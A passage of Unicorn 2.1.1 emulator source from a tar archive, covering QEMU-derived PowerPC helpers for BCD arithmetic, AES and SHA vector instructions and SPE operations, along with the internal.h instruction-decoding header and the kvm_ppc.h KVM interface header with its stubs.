bcd_get_sgn(b); int invalid = (sgnb == 0); lo_value = bcd_get_digit(b, 31, &invalid); for (i = 30; i > 0; i--) { mulu64(&lo_value, &carry, lo_value, 10ULL); mulu64(&hi_value, &unused, hi_value, 10ULL); lo_value += bcd_get_digit(b, i, &invalid); hi_value += carry; if (unlikely(invalid)) { break; } } if (sgnb == -1) { #ifdef _MSC_VER r->VsrSD(1) = 0 - lo_value; #else r->VsrSD(1) = -lo_value; #endif r->VsrSD(0) = ~hi_value + !r->VsrSD(1); } else { r->VsrSD(1) = lo_value; r->VsrSD(0) = hi_value; } cr = bcd_cmp_zero(b); if (unlikely(invalid)) { cr = CRF_SO; } return cr; } uint32_t helper_bcdcpsgn(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int i; int invalid = 0; if (bcd_get_sgn(a) == 0 || bcd_get_sgn(b) == 0) { return CRF_SO; } *r = *a; bcd_put_digit(r, b->VsrB(BCD_DIG_BYTE(0)) & 0xF, 0); for (i = 1; i < 32; i++) { bcd_get_digit(a, i, &invalid); bcd_get_digit(b, i, &invalid); if (unlikely(invalid)) { return CRF_SO; } } return bcd_cmp_zero(r); } uint32_t helper_bcdsetsgn(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int sgnb = bcd_get_sgn(b); *r = *b; bcd_put_digit(r, bcd_preferred_sgn(sgnb, ps), 0); if (bcd_is_valid(b) == false) { return CRF_SO; } return bcd_cmp_zero(r); } uint32_t helper_bcds(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int cr; int i = a->VsrSB(7); bool ox_flag = false; int sgnb = bcd_get_sgn(b); ppc_avr_t ret = *b; ret.VsrD(1) &= ~0xf; if (bcd_is_valid(b) == false) { return CRF_SO; } if (unlikely(i > 31)) { i = 31; } else if (unlikely(i < -31)) { i = -31; } if (i > 0) { ulshift(&ret.VsrD(1), &ret.VsrD(0), i * 4, &ox_flag); } else { urshift(&ret.VsrD(1), &ret.VsrD(0), -i * 4); } bcd_put_digit(&ret, bcd_preferred_sgn(sgnb, ps), 0); *r = ret; cr = bcd_cmp_zero(r); if (ox_flag) { cr |= CRF_SO; } return cr; } uint32_t helper_bcdus(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int cr; int i; int invalid = 0; bool ox_flag = false; ppc_avr_t ret = *b; for (i = 0; i < 32; i++) { bcd_get_digit(b, i, &invalid); if (unlikely(invalid)) { return CRF_SO; } } i = a->VsrSB(7); if (i >= 32) { ox_flag = true; ret.VsrD(1) = ret.VsrD(0) = 0; } else if (i <= -32) { ret.VsrD(1) = ret.VsrD(0) = 0; } else if (i > 0) { ulshift(&ret.VsrD(1), &ret.VsrD(0), i * 4, &ox_flag); } else { urshift(&ret.VsrD(1), &ret.VsrD(0), -i * 4); } *r = ret; cr = bcd_cmp_zero(r); if (ox_flag) { cr |= CRF_SO; } return cr; } uint32_t helper_bcdsr(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int cr; int unused = 0; int invalid = 0; bool ox_flag = false; int sgnb = bcd_get_sgn(b); ppc_avr_t ret = 
*b; ret.VsrD(1) &= ~0xf; int i = a->VsrSB(7); ppc_avr_t bcd_one; bcd_one.VsrD(0) = 0; bcd_one.VsrD(1) = 0x10; if (bcd_is_valid(b) == false) { return CRF_SO; } if (unlikely(i > 31)) { i = 31; } else if (unlikely(i < -31)) { i = -31; } if (i > 0) { ulshift(&ret.VsrD(1), &ret.VsrD(0), i * 4, &ox_flag); } else { urshift(&ret.VsrD(1), &ret.VsrD(0), -i * 4); if (bcd_get_digit(&ret, 0, &invalid) >= 5) { bcd_add_mag(&ret, &ret, &bcd_one, &invalid, &unused); } } bcd_put_digit(&ret, bcd_preferred_sgn(sgnb, ps), 0); cr = bcd_cmp_zero(&ret); if (ox_flag) { cr |= CRF_SO; } *r = ret; return cr; } uint32_t helper_bcdtrunc(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { uint64_t mask; uint32_t ox_flag = 0; int i = a->VsrSH(3) + 1; ppc_avr_t ret = *b; if (bcd_is_valid(b) == false) { return CRF_SO; } if (i > 16 && i < 32) { mask = (uint64_t)-1 >> (128 - i * 4); if (ret.VsrD(0) & ~mask) { ox_flag = CRF_SO; } ret.VsrD(0) &= mask; } else if (i >= 0 && i <= 16) { mask = (uint64_t)-1 >> (64 - i * 4); if (ret.VsrD(0) || (ret.VsrD(1) & ~mask)) { ox_flag = CRF_SO; } ret.VsrD(1) &= mask; ret.VsrD(0) = 0; } bcd_put_digit(&ret, bcd_preferred_sgn(bcd_get_sgn(b), ps), 0); *r = ret; return bcd_cmp_zero(&ret) | ox_flag; } uint32_t helper_bcdutrunc(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int i; uint64_t mask; uint32_t ox_flag = 0; int invalid = 0; ppc_avr_t ret = *b; for (i = 0; i < 32; i++) { bcd_get_digit(b, i, &invalid); if (unlikely(invalid)) { return CRF_SO; } } i = a->VsrSH(3); if (i > 16 && i < 33) { mask = (uint64_t)-1 >> (128 - i * 4); if (ret.VsrD(0) & ~mask) { ox_flag = CRF_SO; } ret.VsrD(0) &= mask; } else if (i > 0 && i <= 16) { mask = (uint64_t)-1 >> (64 - i * 4); if (ret.VsrD(0) || (ret.VsrD(1) & ~mask)) { ox_flag = CRF_SO; } ret.VsrD(1) &= mask; ret.VsrD(0) = 0; } else if (i == 0) { if (ret.VsrD(0) || ret.VsrD(1)) { ox_flag = CRF_SO; } ret.VsrD(0) = ret.VsrD(1) = 0; } *r = ret; if (r->VsrD(0) == 0 && r->VsrD(1) == 0) { return ox_flag | CRF_EQ; } return ox_flag | CRF_GT; } void helper_vsbox(ppc_avr_t *r, ppc_avr_t *a) { int i; VECTOR_FOR_INORDER_I(i, u8) { r->u8[i] = AES_sbox[a->u8[i]]; } } void helper_vcipher(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { ppc_avr_t result; int i; VECTOR_FOR_INORDER_I(i, u32) { result.VsrW(i) = b->VsrW(i) ^ (AES_Te0[a->VsrB(AES_shifts[4 * i + 0])] ^ AES_Te1[a->VsrB(AES_shifts[4 * i + 1])] ^ AES_Te2[a->VsrB(AES_shifts[4 * i + 2])] ^ AES_Te3[a->VsrB(AES_shifts[4 * i + 3])]); } *r = result; } void helper_vcipherlast(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { ppc_avr_t result; int i; VECTOR_FOR_INORDER_I(i, u8) { result.VsrB(i) = b->VsrB(i) ^ (AES_sbox[a->VsrB(AES_shifts[i])]); } *r = result; } void helper_vncipher(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { /* This differs from what is written in ISA V2.07. The RTL is */ /* incorrect and will be fixed in V2.07B. 
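 * Added summary of what the code below does: InvShiftRows and
 * InvSubBytes are applied to a, the round key in b is XORed in, and
 * only then is InvMixColumns applied via the AES_imc tables, so the
 * key is mixed through InvMixColumns as well.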
*/ int i; ppc_avr_t tmp; VECTOR_FOR_INORDER_I(i, u8) { tmp.VsrB(i) = b->VsrB(i) ^ AES_isbox[a->VsrB(AES_ishifts[i])]; } VECTOR_FOR_INORDER_I(i, u32) { r->VsrW(i) = AES_imc[tmp.VsrB(4 * i + 0)][0] ^ AES_imc[tmp.VsrB(4 * i + 1)][1] ^ AES_imc[tmp.VsrB(4 * i + 2)][2] ^ AES_imc[tmp.VsrB(4 * i + 3)][3]; } } void helper_vncipherlast(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { ppc_avr_t result; int i; VECTOR_FOR_INORDER_I(i, u8) { result.VsrB(i) = b->VsrB(i) ^ (AES_isbox[a->VsrB(AES_ishifts[i])]); } *r = result; } void helper_vshasigmaw(ppc_avr_t *r, ppc_avr_t *a, uint32_t st_six) { int st = (st_six & 0x10) != 0; int six = st_six & 0xF; int i; for (i = 0; i < ARRAY_SIZE(r->u32); i++) { if (st == 0) { if ((six & (0x8 >> i)) == 0) { r->VsrW(i) = ror32(a->VsrW(i), 7) ^ ror32(a->VsrW(i), 18) ^ (a->VsrW(i) >> 3); } else { /* six.bit[i] == 1 */ r->VsrW(i) = ror32(a->VsrW(i), 17) ^ ror32(a->VsrW(i), 19) ^ (a->VsrW(i) >> 10); } } else { /* st == 1 */ if ((six & (0x8 >> i)) == 0) { r->VsrW(i) = ror32(a->VsrW(i), 2) ^ ror32(a->VsrW(i), 13) ^ ror32(a->VsrW(i), 22); } else { /* six.bit[i] == 1 */ r->VsrW(i) = ror32(a->VsrW(i), 6) ^ ror32(a->VsrW(i), 11) ^ ror32(a->VsrW(i), 25); } } } } void helper_vshasigmad(ppc_avr_t *r, ppc_avr_t *a, uint32_t st_six) { int st = (st_six & 0x10) != 0; int six = st_six & 0xF; int i; for (i = 0; i < ARRAY_SIZE(r->u64); i++) { if (st == 0) { if ((six & (0x8 >> (2 * i))) == 0) { r->VsrD(i) = ror64(a->VsrD(i), 1) ^ ror64(a->VsrD(i), 8) ^ (a->VsrD(i) >> 7); } else { /* six.bit[2*i] == 1 */ r->VsrD(i) = ror64(a->VsrD(i), 19) ^ ror64(a->VsrD(i), 61) ^ (a->VsrD(i) >> 6); } } else { /* st == 1 */ if ((six & (0x8 >> (2 * i))) == 0) { r->VsrD(i) = ror64(a->VsrD(i), 28) ^ ror64(a->VsrD(i), 34) ^ ror64(a->VsrD(i), 39); } else { /* six.bit[2*i] == 1 */ r->VsrD(i) = ror64(a->VsrD(i), 14) ^ ror64(a->VsrD(i), 18) ^ ror64(a->VsrD(i), 41); } } } } void helper_vpermxor(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { ppc_avr_t result; int i; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { int indexA = c->VsrB(i) >> 4; int indexB = c->VsrB(i) & 0xF; result.VsrB(i) = a->VsrB(indexA) ^ b->VsrB(indexB); } *r = result; } #undef VECTOR_FOR_INORDER_I /*****************************************************************************/ /* SPE extension helpers */ /* Use a table to make this quicker */ static const uint8_t hbrev[16] = { 0x0, 0x8, 0x4, 0xC, 0x2, 0xA, 0x6, 0xE, 0x1, 0x9, 0x5, 0xD, 0x3, 0xB, 0x7, 0xF, }; static inline uint8_t byte_reverse(uint8_t val) { return hbrev[val >> 4] | (hbrev[val & 0xF] << 4); } static inline uint32_t word_reverse(uint32_t val) { return byte_reverse(val >> 24) | (byte_reverse(val >> 16) << 8) | (byte_reverse(val >> 8) << 16) | (byte_reverse(val) << 24); } #define MASKBITS 16 /* Random value - to be fixed (implementation dependent) */ target_ulong helper_brinc(target_ulong arg1, target_ulong arg2) { uint32_t a, b, d, mask; mask = UINT32_MAX >> (32 - MASKBITS); a = arg1 & mask; b = arg2 & mask; d = word_reverse(1 + word_reverse(a | ~b)); return (arg1 & ~mask) | (d & b); } uint32_t helper_cntlsw32(uint32_t val) { if (val & 0x80000000) { return clz32(~val); } else { return clz32(val); } } uint32_t helper_cntlzw32(uint32_t val) { return clz32(val); } /* 440 specific */ target_ulong helper_dlmzb(CPUPPCState *env, target_ulong high, target_ulong low, uint32_t update_Rc) { target_ulong mask; int i; i = 1; for (mask = 0xFF000000; mask != 0; mask = mask >> 8) { if ((high & mask) == 0) { if (update_Rc) { env->crf[0] = 0x4; } goto done; } i++; } for (mask = 0xFF000000; mask != 0; 
mask = mask >> 8) { if ((low & mask) == 0) { if (update_Rc) { env->crf[0] = 0x8; } goto done; } i++; } i = 8; if (update_Rc) { env->crf[0] = 0x2; } done: env->xer = (env->xer & ~0x7F) | i; if (update_Rc) { env->crf[0] |= xer_so; } return i; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/internal.h������������������������������������������������������������0000664�0000000�0000000�00000017362�14675241067�0020221�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC interal definitions for qemu. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef PPC_INTERNAL_H #define PPC_INTERNAL_H #define FUNC_MASK(name, ret_type, size, max_val) \ static inline ret_type name(uint##size##_t start, \ uint##size##_t end) \ { \ ret_type ret, max_bit = size - 1; \ \ if (likely(start == 0)) { \ ret = max_val << (max_bit - end); \ } else if (likely(end == max_bit)) { \ ret = max_val >> start; \ } else { \ ret = (((uint##size##_t)(0ULL - 1ULL)) >> (start)) ^ \ (((uint##size##_t)(0ULL - 1ULL) >> (end)) >> 1); \ if (unlikely(start > end)) { \ return ~ret; \ } \ } \ \ return ret; \ } #if defined(TARGET_PPC64) FUNC_MASK(MASK, target_ulong, 64, UINT64_MAX); #else FUNC_MASK(MASK, target_ulong, 32, UINT32_MAX); #endif FUNC_MASK(mask_u32, uint32_t, 32, UINT32_MAX); FUNC_MASK(mask_u64, uint64_t, 64, UINT64_MAX); /*****************************************************************************/ /*** Instruction decoding ***/ #define EXTRACT_HELPER(name, shift, nb) \ static inline uint32_t name(uint32_t opcode) \ { \ return extract32(opcode, shift, nb); \ } #define EXTRACT_SHELPER(name, shift, nb) \ static inline int32_t name(uint32_t opcode) \ { \ return sextract32(opcode, shift, nb); \ } #define EXTRACT_HELPER_SPLIT(name, shift1, nb1, shift2, nb2) \ static inline uint32_t name(uint32_t opcode) \ { \ return extract32(opcode, shift1, nb1) << nb2 | \ extract32(opcode, shift2, nb2); \ } #define EXTRACT_HELPER_SPLIT_3(name, \ d0_bits, shift_op_d0, shift_d0, \ d1_bits, shift_op_d1, shift_d1, \ d2_bits, shift_op_d2, shift_d2) \ static inline int16_t name(uint32_t opcode) \ { \ return \ (((opcode >> (shift_op_d0)) & ((1 << (d0_bits)) - 1)) << (shift_d0)) | \ (((opcode >> (shift_op_d1)) & ((1 << (d1_bits)) - 1)) << (shift_d1)) | \ (((opcode >> (shift_op_d2)) & ((1 << (d2_bits)) - 1)) << (shift_d2)); \ } /* Opcode part 1 */ EXTRACT_HELPER(opc1, 26, 6); /* Opcode part 2 */ 
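/*
 * Expansion sketch (added for illustration, not in the original header):
 * the invocation on the next line generates
 *
 *     static inline uint32_t opc2(uint32_t opcode)
 *     {
 *         return extract32(opcode, 1, 5);
 *     }
 *
 * i.e. opc2() pulls the low five bits of the extended-opcode field out
 * of the instruction word; every EXTRACT_HELPER below follows the same
 * pattern.
 */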
EXTRACT_HELPER(opc2, 1, 5); /* Opcode part 3 */ EXTRACT_HELPER(opc3, 6, 5); /* Opcode part 4 */ EXTRACT_HELPER(opc4, 16, 5); /* Update Cr0 flags */ EXTRACT_HELPER(Rc, 0, 1); /* Update Cr6 flags (Altivec) */ EXTRACT_HELPER(Rc21, 10, 1); /* Destination */ EXTRACT_HELPER(rD, 21, 5); /* Source */ EXTRACT_HELPER(rS, 21, 5); /* First operand */ EXTRACT_HELPER(rA, 16, 5); /* Second operand */ EXTRACT_HELPER(rB, 11, 5); /* Third operand */ EXTRACT_HELPER(rC, 6, 5); /*** Get CRn ***/ EXTRACT_HELPER(crfD, 23, 3); EXTRACT_HELPER(BF, 23, 3); EXTRACT_HELPER(crfS, 18, 3); EXTRACT_HELPER(crbD, 21, 5); EXTRACT_HELPER(crbA, 16, 5); EXTRACT_HELPER(crbB, 11, 5); /* SPR / TBL */ EXTRACT_HELPER(_SPR, 11, 10); static inline uint32_t SPR(uint32_t opcode) { uint32_t sprn = _SPR(opcode); return ((sprn >> 5) & 0x1F) | ((sprn & 0x1F) << 5); } /*** Get constants ***/ /* 16 bits signed immediate value */ EXTRACT_SHELPER(SIMM, 0, 16); /* 16 bits unsigned immediate value */ EXTRACT_HELPER(UIMM, 0, 16); /* 5 bits signed immediate value */ EXTRACT_SHELPER(SIMM5, 16, 5); /* 5 bits signed immediate value */ EXTRACT_HELPER(UIMM5, 16, 5); /* 4 bits unsigned immediate value */ EXTRACT_HELPER(UIMM4, 16, 4); /* Bit count */ EXTRACT_HELPER(NB, 11, 5); /* Shift count */ EXTRACT_HELPER(SH, 11, 5); /* lwat/stwat/ldat/lwat */ EXTRACT_HELPER(FC, 11, 5); /* Vector shift count */ EXTRACT_HELPER(VSH, 6, 4); /* Mask start */ EXTRACT_HELPER(MB, 6, 5); /* Mask end */ EXTRACT_HELPER(ME, 1, 5); /* Trap operand */ EXTRACT_HELPER(TO, 21, 5); EXTRACT_HELPER(CRM, 12, 8); EXTRACT_HELPER(SR, 16, 4); /* mtfsf/mtfsfi */ EXTRACT_HELPER(FPBF, 23, 3); EXTRACT_HELPER(FPIMM, 12, 4); EXTRACT_HELPER(FPL, 25, 1); EXTRACT_HELPER(FPFLM, 17, 8); EXTRACT_HELPER(FPW, 16, 1); /* mffscrni */ EXTRACT_HELPER(RM, 11, 2); /* addpcis */ EXTRACT_HELPER_SPLIT_3(DX, 10, 6, 6, 5, 16, 1, 1, 0, 0) #if defined(TARGET_PPC64) /* darn */ EXTRACT_HELPER(L, 16, 2); #endif /*** Jump target decoding ***/ /* Immediate address */ static inline target_ulong LI(uint32_t opcode) { return (opcode >> 0) & 0x03FFFFFC; } static inline uint32_t BD(uint32_t opcode) { return (opcode >> 0) & 0xFFFC; } EXTRACT_HELPER(BO, 21, 5); EXTRACT_HELPER(BI, 16, 5); /* Absolute/relative address */ EXTRACT_HELPER(AA, 1, 1); /* Link */ EXTRACT_HELPER(LK, 0, 1); /* DFP Z22-form */ EXTRACT_HELPER(DCM, 10, 6) /* DFP Z23-form */ EXTRACT_HELPER(RMC, 9, 2) EXTRACT_HELPER(Rrm, 16, 1) EXTRACT_HELPER_SPLIT(DQxT, 3, 1, 21, 5); EXTRACT_HELPER_SPLIT(xT, 0, 1, 21, 5); EXTRACT_HELPER_SPLIT(xS, 0, 1, 21, 5); EXTRACT_HELPER_SPLIT(xA, 2, 1, 16, 5); EXTRACT_HELPER_SPLIT(xB, 1, 1, 11, 5); EXTRACT_HELPER_SPLIT(xC, 3, 1, 6, 5); EXTRACT_HELPER(DM, 8, 2); EXTRACT_HELPER(UIM, 16, 2); EXTRACT_HELPER(SHW, 8, 2); EXTRACT_HELPER(SP, 19, 2); EXTRACT_HELPER(IMM8, 11, 8); EXTRACT_HELPER(DCMX, 16, 7); EXTRACT_HELPER_SPLIT_3(DCMX_XV, 5, 16, 0, 1, 2, 5, 1, 6, 6); void helper_compute_fprf_float16(CPUPPCState *env, float16 arg); void helper_compute_fprf_float32(CPUPPCState *env, float32 arg); void helper_compute_fprf_float128(CPUPPCState *env, float128 arg); /* Raise a data fault alignment exception for the specified virtual address */ void ppc_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); #endif /* PPC_INTERNAL_H */ 
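/*
 * Worked examples for FUNC_MASK above (added, illustrative): these are
 * the wrap-around masks consumed by the VRLMI rotate helpers earlier in
 * this archive. Bit 0 is the MSB (IBM numbering):
 *
 *     mask_u64(0, 7)  == 0xff00000000000000ull    -- plain range
 *     mask_u64(60, 3) == 0xf00000000000000full    -- start > end wraps
 */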
unicorn-2.1.1/qemu/target/ppc/kvm_ppc.h

/*
 * Copyright 2008 IBM Corporation.
 * Authors: Hollis Blanchard <hollisb@us.ibm.com>
 *
 * This work is licensed under the GNU GPL license version 2 or later.
 *
 */

#ifndef KVM_PPC_H
#define KVM_PPC_H

#define TYPE_HOST_POWERPC_CPU POWERPC_CPU_TYPE_NAME("host")

#ifdef CONFIG_KVM

uint32_t kvmppc_get_tbfreq(void);
uint64_t kvmppc_get_clockfreq(void);
bool kvmppc_get_host_model(char **buf);
bool kvmppc_get_host_serial(char **buf);
int kvmppc_get_hasidle(CPUPPCState *env);
int kvmppc_get_hypercall(CPUPPCState *env, uint8_t *buf, int buf_len);
int kvmppc_set_interrupt(PowerPCCPU *cpu, int irq, int level);
void kvmppc_enable_logical_ci_hcalls(void);
void kvmppc_enable_set_mode_hcall(void);
void kvmppc_enable_clear_ref_mod_hcalls(void);
void kvmppc_enable_h_page_init(void);
void kvmppc_set_papr(PowerPCCPU *cpu);
int kvmppc_set_compat(PowerPCCPU *cpu, uint32_t compat_pvr);
void kvmppc_set_mpic_proxy(PowerPCCPU *cpu, int mpic_proxy);
bool kvmppc_get_fwnmi(void);
int kvmppc_set_fwnmi(void);
int kvmppc_smt_threads(void);
void kvmppc_error_append_smt_possible_hint(Error *const *errp);
int kvmppc_set_smt_threads(int smt);
int kvmppc_clear_tsr_bits(PowerPCCPU *cpu, uint32_t tsr_bits);
int kvmppc_or_tsr_bits(PowerPCCPU *cpu, uint32_t tsr_bits);
int kvmppc_set_tcr(PowerPCCPU *cpu);
int kvmppc_booke_watchdog_enable(PowerPCCPU *cpu);
target_ulong kvmppc_configure_v3_mmu(PowerPCCPU *cpu,
                                     bool radix, bool gtse,
                                     uint64_t proc_tbl);
void kvmppc_svm_off(Error **errp);
bool kvmppc_spapr_use_multitce(void);
int kvmppc_spapr_enable_inkernel_multitce(void);
void *kvmppc_create_spapr_tce(uint32_t liobn, uint32_t page_shift,
                              uint64_t bus_offset, uint32_t nb_table,
                              int *pfd, bool need_vfio);
int kvmppc_remove_spapr_tce(void *table, int pfd, uint32_t window_size);
int kvmppc_reset_htab(int shift_hint);
uint64_t kvmppc_vrma_limit(unsigned int hash_shift);
bool kvmppc_has_cap_spapr_vfio(void);
bool kvmppc_has_cap_epr(void);
int kvmppc_define_rtas_kernel_token(uint32_t token, const char *function);
int kvmppc_get_htab_fd(bool write, uint64_t index, Error **errp);
int kvmppc_save_htab(QEMUFile *f, int fd, size_t bufsize, int64_t max_ns);
int kvmppc_load_htab_chunk(QEMUFile *f, int fd, uint32_t index,
                           uint16_t n_valid, uint16_t n_invalid);
void kvmppc_read_hptes(ppc_hash_pte64_t *hptes, hwaddr ptex, int n);
void kvmppc_write_hpte(hwaddr ptex, uint64_t pte0, uint64_t pte1);
bool kvmppc_has_cap_fixup_hcalls(void);
bool kvmppc_has_cap_htm(void);
bool kvmppc_has_cap_mmu_radix(void);
bool kvmppc_has_cap_mmu_hash_v3(void);
bool kvmppc_has_cap_xive(void);
int kvmppc_get_cap_safe_cache(void);
int kvmppc_get_cap_safe_bounds_check(void);
int kvmppc_get_cap_safe_indirect_branch(void);
int kvmppc_get_cap_count_cache_flush_assist(void);
bool
kvmppc_has_cap_nested_kvm_hv(void); int kvmppc_set_cap_nested_kvm_hv(int enable); int kvmppc_get_cap_large_decr(void); int kvmppc_enable_cap_large_decr(PowerPCCPU *cpu, int enable); int kvmppc_enable_hwrng(void); int kvmppc_put_books_sregs(PowerPCCPU *cpu); PowerPCCPUClass *kvm_ppc_get_host_cpu_class(void); void kvmppc_check_papr_resize_hpt(Error **errp); int kvmppc_resize_hpt_prepare(PowerPCCPU *cpu, target_ulong flags, int shift); int kvmppc_resize_hpt_commit(PowerPCCPU *cpu, target_ulong flags, int shift); bool kvmppc_pvr_workaround_required(PowerPCCPU *cpu); bool kvmppc_hpt_needs_host_contiguous_pages(void); void kvm_check_mmu(PowerPCCPU *cpu, Error **errp); void kvmppc_set_reg_ppc_online(PowerPCCPU *cpu, unsigned int online); void kvmppc_set_reg_tb_offset(PowerPCCPU *cpu, int64_t tb_offset); int kvm_handle_nmi(PowerPCCPU *cpu, struct kvm_run *run); #else static inline uint32_t kvmppc_get_tbfreq(void) { return 0; } static inline bool kvmppc_get_host_model(char **buf) { return false; } static inline bool kvmppc_get_host_serial(char **buf) { return false; } static inline uint64_t kvmppc_get_clockfreq(void) { return 0; } static inline uint32_t kvmppc_get_vmx(void) { return 0; } static inline uint32_t kvmppc_get_dfp(void) { return 0; } static inline int kvmppc_get_hasidle(CPUPPCState *env) { return 0; } static inline int kvmppc_get_hypercall(CPUPPCState *env, uint8_t *buf, int buf_len) { return -1; } static inline int kvmppc_set_interrupt(PowerPCCPU *cpu, int irq, int level) { return -1; } static inline void kvmppc_enable_logical_ci_hcalls(void) { } static inline void kvmppc_enable_set_mode_hcall(void) { } static inline void kvmppc_enable_clear_ref_mod_hcalls(void) { } static inline void kvmppc_enable_h_page_init(void) { } static inline void kvmppc_set_papr(PowerPCCPU *cpu) { } static inline int kvmppc_set_compat(PowerPCCPU *cpu, uint32_t compat_pvr) { return 0; } static inline void kvmppc_set_mpic_proxy(PowerPCCPU *cpu, int mpic_proxy) { } static inline bool kvmppc_get_fwnmi(void) { return false; } static inline int kvmppc_set_fwnmi(void) { return -1; } static inline int kvmppc_smt_threads(void) { return 1; } static inline void kvmppc_error_append_smt_possible_hint(Error *const *errp) { return; } static inline int kvmppc_set_smt_threads(int smt) { return 0; } static inline int kvmppc_or_tsr_bits(PowerPCCPU *cpu, uint32_t tsr_bits) { return 0; } static inline int kvmppc_clear_tsr_bits(PowerPCCPU *cpu, uint32_t tsr_bits) { return 0; } static inline int kvmppc_set_tcr(PowerPCCPU *cpu) { return 0; } static inline int kvmppc_booke_watchdog_enable(PowerPCCPU *cpu) { return -1; } static inline target_ulong kvmppc_configure_v3_mmu(PowerPCCPU *cpu, bool radix, bool gtse, uint64_t proc_tbl) { return 0; } static inline void kvmppc_svm_off(Error **errp) { return; } static inline void kvmppc_set_reg_ppc_online(PowerPCCPU *cpu, unsigned int online) { return; } static inline void kvmppc_set_reg_tb_offset(PowerPCCPU *cpu, int64_t tb_offset) { } static inline bool kvmppc_spapr_use_multitce(void) { return false; } static inline int kvmppc_spapr_enable_inkernel_multitce(void) { return -1; } static inline void *kvmppc_create_spapr_tce(uint32_t liobn, uint32_t page_shift, uint64_t bus_offset, uint32_t nb_table, int *pfd, bool need_vfio) { return NULL; } static inline int kvmppc_remove_spapr_tce(void *table, int pfd, uint32_t nb_table) { return -1; } static inline int kvmppc_reset_htab(int shift_hint) { return 0; } static inline uint64_t kvmppc_vrma_limit(unsigned int hash_shift) { g_assert_not_reached(); } 
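
/*
 * Note on the stubs above and below: queries that may legitimately run
 * without KVM return a benign default (0, false or -1), while paths
 * that must never be reached when KVM is compiled out abort() or
 * g_assert_not_reached().
 */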
static inline bool kvmppc_hpt_needs_host_contiguous_pages(void) { return false; } static inline void kvm_check_mmu(PowerPCCPU *cpu, Error **errp) { } static inline bool kvmppc_has_cap_spapr_vfio(void) { return false; } static inline bool kvmppc_has_cap_epr(void) { return false; } static inline int kvmppc_define_rtas_kernel_token(uint32_t token, const char *function) { return -1; } static inline int kvmppc_get_htab_fd(bool write, uint64_t index, Error **errp) { return -1; } static inline int kvmppc_save_htab(QEMUFile *f, int fd, size_t bufsize, int64_t max_ns) { abort(); } static inline int kvmppc_load_htab_chunk(QEMUFile *f, int fd, uint32_t index, uint16_t n_valid, uint16_t n_invalid) { abort(); } static inline void kvmppc_read_hptes(ppc_hash_pte64_t *hptes, hwaddr ptex, int n) { abort(); } static inline void kvmppc_write_hpte(hwaddr ptex, uint64_t pte0, uint64_t pte1) { abort(); } static inline bool kvmppc_has_cap_fixup_hcalls(void) { abort(); } static inline bool kvmppc_has_cap_htm(void) { return false; } static inline bool kvmppc_has_cap_mmu_radix(void) { return false; } static inline bool kvmppc_has_cap_mmu_hash_v3(void) { return false; } static inline bool kvmppc_has_cap_xive(void) { return false; } static inline int kvmppc_get_cap_safe_cache(void) { return 0; } static inline int kvmppc_get_cap_safe_bounds_check(void) { return 0; } static inline int kvmppc_get_cap_safe_indirect_branch(void) { return 0; } static inline int kvmppc_get_cap_count_cache_flush_assist(void) { return 0; } static inline bool kvmppc_has_cap_nested_kvm_hv(void) { return false; } static inline int kvmppc_set_cap_nested_kvm_hv(int enable) { return -1; } static inline int kvmppc_get_cap_large_decr(void) { return 0; } static inline int kvmppc_enable_cap_large_decr(PowerPCCPU *cpu, int enable) { return -1; } static inline int kvmppc_enable_hwrng(void) { return -1; } static inline int kvmppc_put_books_sregs(PowerPCCPU *cpu) { abort(); } static inline PowerPCCPUClass *kvm_ppc_get_host_cpu_class(void) { return NULL; } static inline void kvmppc_check_papr_resize_hpt(Error **errp) { return; } static inline int kvmppc_resize_hpt_prepare(PowerPCCPU *cpu, target_ulong flags, int shift) { return -ENOSYS; } static inline int kvmppc_resize_hpt_commit(PowerPCCPU *cpu, target_ulong flags, int shift) { return -ENOSYS; } static inline bool kvmppc_pvr_workaround_required(PowerPCCPU *cpu) { return false; } #endif #ifndef CONFIG_KVM #define kvmppc_eieio() do { } while (0) static inline void kvmppc_dcbst_range(PowerPCCPU *cpu, uint8_t *addr, int len) { } static inline void kvmppc_icbi_range(PowerPCCPU *cpu, uint8_t *addr, int len) { } #else /* CONFIG_KVM */ #define kvmppc_eieio() \ do { \ if (kvm_enabled()) { \ asm volatile("eieio" : : : "memory"); \ } \ } while (0) /* Store data cache blocks back to memory */ static inline void kvmppc_dcbst_range(PowerPCCPU *cpu, uint8_t *addr, int len) { uint8_t *p; for (p = addr; p < addr + len; p += cpu->env.dcache_line_size) { asm volatile("dcbst 0,%0" : : "r"(p) : "memory"); } } /* Invalidate instruction cache blocks */ static inline void kvmppc_icbi_range(PowerPCCPU *cpu, uint8_t *addr, int len) { uint8_t *p; for (p = addr; p < addr + len; p += cpu->env.icache_line_size) { asm volatile("icbi 0,%0" : : "r"(p)); } } #endif /* CONFIG_KVM */ #endif /* KVM_PPC_H */ 
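
/*
 * A minimal caller sketch (added for illustration; not part of the
 * original header, and the function name is hypothetical). It shows why
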